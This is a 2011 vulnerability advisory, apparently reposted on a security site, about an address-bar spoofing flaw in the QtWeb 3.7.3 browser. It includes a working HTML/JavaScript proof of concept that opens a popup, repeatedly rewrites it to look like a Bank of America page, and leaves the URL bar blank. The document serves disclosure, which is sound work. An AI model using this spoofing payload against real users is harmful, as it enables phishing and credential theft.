QtWeb 3.7.3 URL Spoof

2011-10-05 / 2011-10-06
Credit: Lostmon
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################# QTWeb Internet Browser URL weakness lets remote attackers to do Spoof or phishing attacks Vendor URL: http://www.qtweb.net/ Vendor bugtrack=> http://code.google.com/p/qtweb/issues/detail?id=151 Advisore: http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html Vendor notify: YES exploit available: YES ################################################## ################### Description By vendor ################### QtWeb Internet Browser - lightweight, secure and portable browser having unique user interface and privacy features. QtWeb is an open source project based on Nokia's Qt framework and Apple's WebKit rendering engine (the same as being used in Apple Safari and Google Chrome). ###################### Vulnerability Description ###################### In a normal case when navigate to a site, the browser shows real URL But it has a weakness and a attacker can show a empty URL. This weakness can be used for pishing or spoof attacks because you can think that you are in bank of america for example and the browser don't show nothing in URL:) Whithout Any URL => http://3.bp.blogspot.com/-fo5gIcETZwE/TomQza97d0I/AAAAAAAAAFw/hMl0NPCRvqA/s400/qt1.jpg Also a attacker can compose a popup with atributes and it can be used too for spoof or phishing attacks. toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0 Popup Whithout Toolbars and address bar => http://3.bp.blogspot.com/-fixIYjkGkCE/TomSNePdc4I/AAAAAAAAAF0/vSKXq1aufo8/s400/qt2.jpg ################ Versions afected ################ QTweb 3.7.2 Vulnerable QTweb 3.7.3 (buils 087) Vulnerable and posible prior versions. ###################### Proof Of Concept ###################### <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>QTweb 3.7.2 and 3.7.3 (buils 087) document.open() URL weakness Spoof testcase by Lostmon</title> <script type="text/javascript"> var wx; function invokePoC() { wx = open(":#:","newwin"); setInterval("doit()",1); } function doit() { wx.document.open(); wx.document.write("<title>Bank of America | Home | Personal</title><img src='data:image/gif;base64,R0lGODdh8QLUAfcAAAAAAAAAQAAAgAAA/wAgAAAgQAAggAAg/wBAAABAQABAgABA/wBgAABgQABggABg/wCAAACAQACAgACA/wCgAACgxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxNG7MQOvIAAADs='/>"); } </script> </head> <body> <h1>QTweb 3.7.2 and 3.7.3 (buils 087) document.open() URL weakness Spoof testcase by Lostmon</h1> <noscript><p>this testcase requires JavaScript to run.</p></noscript> <p>First Click in this link ==> <a href=":#:" onClick="invokePoC();" target="_blank">invoke PoC</a></p> <p>and Look in result window, the address bar , don't show The url and if you write any url in the address bar, the browser do not navigate to it. This issue can be used to spoof sites or pishing attacks. Safari 5.1 (7534.50) </body> </html> ################ Solution ############### No solution at this time !!! ############### Timeline ############### Discovered :Mar 30, 2011 Vendor Notify: Sep 28, 2011 Vendor response: XXXXX Vendor Patch: XXXXXX Public Disclosure: Oct 03, 2011 ########################## ?nd ######################## Atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top